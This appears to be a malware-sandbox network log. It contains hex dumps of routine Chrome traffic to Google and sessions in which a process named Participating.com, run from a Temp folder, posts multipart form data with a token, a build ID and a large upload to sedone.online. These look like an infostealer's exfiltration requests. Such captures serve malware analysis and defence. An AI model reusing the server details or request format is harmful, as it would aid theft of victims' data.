                                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-12-16 12:46:59 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Version: 704583840
                                                                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:58 GMT
                                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                2024-12-16 12:46:59 UTC372INData Raw: 31 33 33 33 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                Data Ascii: 1333)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                2024-12-16 12:46:59 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                2024-12-16 12:46:59 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                2024-12-16 12:46:59 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                2024-12-16 12:46:59 UTC381INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                2024-12-16 12:46:59 UTC921INData Raw: 33 39 32 0d 0a 72 2f 61 6c 2d 69 63 6f 6e 2e 70 6e 67 5c 22 20 61 6c 74 5c 75 30 30 33 64 5c 22 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 20 5c 5c 39 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 69 6d 61 67 65 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 73 76 67 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30
                                                                                                                                                                                                                                                                Data Ascii: 392r/al-icon.png\" alt\u003d\"\" height\u003d\"24\" width\u003d\"24\" style\u003d\"border:none;display:none \\9\"\u003e\u003c\/image\u003e\u003c\/svg\u003e\u003c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u00
                                                                                                                                                                                                                                                                2024-12-16 12:46:59 UTC1390INData Raw: 38 30 30 30 0d 0a 2d 6c 61 62 65 6c 30 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 30 35 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f
                                                                                                                                                                                                                                                                Data Ascii: 8000-label0","left_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700305,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_
                                                                                                                                                                                                                                                                2024-12-16 12:46:59 UTC1390INData Raw: 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 5c 6e 2a 2f 5c 6e 76 61 72 20 4c 64 3b 5f 2e 4a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 4c 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4b 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61
                                                                                                                                                                                                                                                                Data Ascii: tifier: Apache-2.0\n*/\nvar Ld;_.Jd\u003dfunction(a){const b\u003da.length;if(b\u003e0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Ld\u003dfunction(a){return new _.Kd(b\u003d\u003eb.substr(0,a.length+1).toLowerCa
                                                                                                                                                                                                                                                                2024-12-16 12:46:59 UTC1390INData Raw: 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 59 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 59 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 65 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72
                                                                                                                                                                                                                                                                Data Ascii: ();return new _.Yd(b?b.createScriptURL(a):a)};_.$d\u003dfunction(a){if(a instanceof _.Yd)return a.i;throw Error(\"F\");};_.be\u003dfunction(a){if(ae.test(a))return a};_.ce\u003dfunction(a){if(a instanceof _.Nd)if(a instanceof _.Nd)a\u003da.i;else throw Er
                                                                                                                                                                                                                                                                2024-12-16 12:46:59 UTC1390INData Raw: 75 6d 65 6e 74 3b 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3f 61 5c 75 30 30 33 64 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 70 65 5c
                                                                                                                                                                                                                                                                Data Ascii: ument;c.getElementsByClassName?a\u003dc.getElementsByClassName(a)[0]:(c\u003ddocument,a?a\u003d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.pe\


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                10192.168.2.849728142.250.181.684432168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:46:58 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-12-16 12:46:59 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Version: 704583840
                                                                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:58 GMT
                                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                2024-12-16 12:46:59 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                2024-12-16 12:46:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                11192.168.2.849738116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:02 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----PH4EU37QIEUAAASR9H4E
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 505
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:02 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 50 48 34 45 55 33 37 51 49 45 55 41 41 41 53 52 39 48 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 50 48 34 45 55 33 37 51 49 45 55 41 41 41 53 52 39 48 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 50 48 34 45 55 33 37 51 49 45 55 41 41 41 53 52 39 48 34 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------PH4EU37QIEUAAASR9H4EContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------PH4EU37QIEUAAASR9H4EContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------PH4EU37QIEUAAASR9H4ECont
                                                                                                                                                                                                                                                                2024-12-16 12:47:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:03 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:47:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                12192.168.2.849740116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:47:03 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----B1DBAIWTRQIE3E3OH4EC
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 213453
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:47:03 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 42 31 44 42 41 49 57 54 52 51 49 45 33 45 33 4f 48 34 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 42 31 44 42 41 49 57 54 52 51 49 45 33 45 33 4f 48 34 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 42 31 44 42 41 49 57 54 52 51 49 45 33 45 33 4f 48 34 45 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------B1DBAIWTRQIE3E3OH4ECContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------B1DBAIWTRQIE3E3OH4ECContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------B1DBAIWTRQIE3E3OH4ECCont
                                                                                                                                                                                                                                                                2024-12-16 12:47:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
